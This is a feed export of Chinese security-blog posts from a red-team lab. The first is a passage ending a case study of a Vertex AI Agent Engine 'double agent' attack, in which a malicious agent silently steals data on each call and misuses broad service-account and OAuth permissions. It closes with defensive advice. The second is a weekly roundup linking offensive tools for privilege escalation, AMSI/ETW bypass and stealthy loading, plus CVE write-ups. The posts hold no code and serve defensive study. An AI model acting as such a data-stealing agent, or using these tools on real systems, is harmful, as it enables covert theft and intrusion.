auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">04 潜在影响评估</span></span></strong></p></div></div></div></div><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">数据泄露风险：</span></strong><span leaf="">攻击者可静默读取项目内敏感文件，整个过程几乎无明显告警，隐蔽性极高；</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">供应链攻击潜力：</span></strong><span leaf="">获取谷歌内部 Artifact Registry 镜像后，攻击者能够逆向分析 Vertex AI 的实现细节，进而构造更高级的逃逸或绕过技术；</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">持久化后门：</span></strong><span leaf="">恶意代理在每次正常调用时均执行窃取逻辑，常规日志难以区分，易实现长期潜伏；</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">横向移动能力：</span></strong><span leaf="">若 OAuth scopes 涉及 Workspace 服务，可能导致敏感数据在企业级范围内扩散，形成更大范围的 compromise。</span></p></li></ul><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">05 缓解措施建议</span></span></strong></p></div></div></div></div><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">谷歌在收到 Unit 42 报告后，已更新官方文档，明确说明了 Vertex AI 资源、账号及代理的使用规范。但要真正提升安全水平，仍需用户主动加固配置。推荐采取以下措施：</span></p><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""> 强制使用 Bring Your Own Service Account（BYOSA） 放弃默认的 P4SA 服务账号，创建专用服务账号并严格遵循最小权限原则（Principle of Least Privilege），仅授予代理实际运行所需的权限。在 Agent Engine 配置中明确指定该自定义账号。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">收紧 OAuth 2.0 scopes 默认 scopes 过于宽松且无法直接编辑，存在显著凭证滥用风险。建议结合 BYOSA 配置，进一步限制整体访问范围，避免不必要的服务暴露。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">谨慎使用 pickle 序列化 由于 pickle 存在固有的任意代码执行风险，建议优先采用其他更安全的序列化方式，或在可信隔离环境完成代码打包，并进行严格的代码审查和安全扫描。</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">加强 Artifact Registry 访问控制 对 Google 内部及项目内的 Artifact Registry 仓库实施严格的访问限制，防止被 compromised 的服务账号下载受限镜像和内部依赖文件。</span></p></li></ol><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">截至目前，AISS安全智链社区已收录百余条案例，涵盖多种AI安全风险，感兴趣的读者可前往 <a href="https://aiss.nsfocus.com/#/ai-cases" target="_blank">https://aiss.nsfocus.com/#/ai-cases</a> 查看更多 AI 安全相关案例分析与最新研究。</span></p><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">06 总结</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Vertex AI Agent Engine的双面间谍案例说明，AI代理快速部署带来的便利同时引入了新的权限滥用风险。使用Vertex AI Agent Engine的团队应尽快检查现有代理配置，优先采用BYOSA和最小权限设置，降低默认配置带来的隐患。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">原文报告链接：<a href="https://unit42.paloaltonetworks.com/double-agents-vertex-ai/" target="_blank">https://unit42.paloaltonetworks.com/double-agents-vertex-ai/</a></span></p></div><div style="margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 95%;vertical-align: top;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);padding: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 11px;margin: -44px 0% 0px;box-sizing: border-box;"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin: 0px -2.18em 0px -2.2em;box-sizing: border-box;"><div data-cacheurl="" data-remoteid="" style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: 50.9993% 50%;background-repeat: no-repeat;background-size: 170.274%;border-width: 3px;border-style: solid;border-color: rgb(255, 255, 255);overflow: hidden;box-sizing: border-box;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=2318e05d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCmNacichzZKWYyxrE4bS7iaDj8m0QMb1Bz0Ws4rVCjAUjkN8yYQpKuK0BtibsRjVbIoOw1dmnjibhVFbBRqgO7J1Xf3rKWTIuIETkQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;max-width: 100%;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9722222" data-s="300,640" data-type="png" data-w="1080" style="width: 100%;height: 100%;opacity: 0;box-sizing: border-box;" data-imgfileid="100011279" src="https://wechat2rss.xlab.app/img-proxy/?k=adbde849&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCmoQoMBRt76CNdL4Os3g9rt8J2yJlRq7jbcTJaibcIy24uAK9FfZMTRGo29AcDBCh06cB5yFP7vQfeS5wDNlL7oJf4icWbAFfxmY%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.8;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">绿盟科技天元实验室</span></strong><span leaf="">专注于新型实战化攻防对抗技术研究。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究目标包括：漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术，以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究，以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术，从攻击视角提供识别风险的方法和手段，为威胁对抗提供决策支撑。</span></p></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011277" src="https://wechat2rss.xlab.app/img-proxy/?k=bd47b12d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCnaYeJ77fWJHzD4Anf6qD3IyLzcxj16IglrxwxDBuJoL5swk4tM9APXwOjNBvMORpJaW2y5VAKuxdDbVxGnDYgWWjIenM0xkNs%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011278" src="https://wechat2rss.xlab.app/img-proxy/?k=1c6a0e1b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCmyvAeatS8AUBlNY0q7LM38bmbTgQlno7wEP0eK5wWibKTqjDbRFyzXkgbFQlnQRsqYHs7qdbvHDtLdyTJo0ZQ7ZwDPTN8ia5cRo%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=5a6f1b66&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494930%26idx%3D1%26sn%3D85c69d8937cbb34f62acb40cd4cedc50">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 08 Apr 2026 18:01:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.3.28-2026.4.3）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494916&amp;idx=1&amp;sn=b01106658b570c0d850fb0a21ccbb036</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-04-03 18:02</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a972b10c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FTPGibEO8KBwbD5z6C0g2NAp2OicEl3fdbRrPUY2MuWIcreXMC0tGBdfWBviaqDPPyN63iawoWIujD6l1Fx5keMUib4w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="line-height: 1.6;letter-spacing: 0px;padding-right: 0px;padding-left: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4222222" data-s="300,640" data-type="png" data-w="900" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011267" src="https://wechat2rss.xlab.app/img-proxy/?k=96deba3a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCmhD0H5dCgO41OautVyk5LNx1MGWiafWmMNH80boeibRmCXz8FgvJFicYdMMU5BaMDu8dyNhtBLOkxG5pg1icQFfwUchvDXuCKdm5A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内网渗透</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">BridgeHead：通过C++访问ADWS接口绕过.NET/WCF/HTTP栈，攻击者可进行AD枚举和横向移动</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/ZakiPedio/BridgeHead" target="_blank">https://github.com/ZakiPedio/BridgeHead</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">homelable：开源家庭实验室可视化工具可能被用于内部网络侦察</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Pouzor/homelable" target="_blank">https://github.com/Pouzor/homelable</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">ludus-mcp：攻击者可能利用Ludus MCP自动部署攻击环境</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/badsectorlabs/ludus-mcp" target="_blank">https://github.com/badsectorlabs/ludus-mcp</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">终端对抗</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">trustme：利用DISM API和线程模拟实现TrustedInstaller权限提升</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/Meowmycks/trustme" target="_blank">https://github.com/Meowmycks/trustme</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">NOFILTER-NFEXEC：Havoc C2 BOF工具实现内核提权、间接系统调用和AMSI/ETW绕过</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/y637F9QQ2x/NOFILTER-NFEXEC" target="_blank">https://github.com/y637F9QQ2x/NOFILTER-NFEXEC</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CustomLoadImage：利用AssemblyNative::LoadFromBuffer隐蔽加载.NET程序集</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/backdoorskid/CustomLoadImage" target="_blank">https://github.com/backdoorskid/CustomLoadImage</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞相关</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-3055：SAML IDP配置导致内存越读，可泄露会话ID并绕过认证</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/" target="_blank">https://labs.watchtowr.com/the-sequels-are-never-as-good-but-were-still-in-pain-citrix-netscaler-cve-2026-3055-memory-overread/</a></span></p></div><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/" target="_blank">https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/</a></span></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-22708：Cursor环境变量绕过注入漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/cursor/cursor/security/advisories/GHSA-82wg-qcm4-fp2w" target="_blank">https://github.com/cursor/cursor/security/advisories/GHSA-82wg-qcm4-fp2w</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: 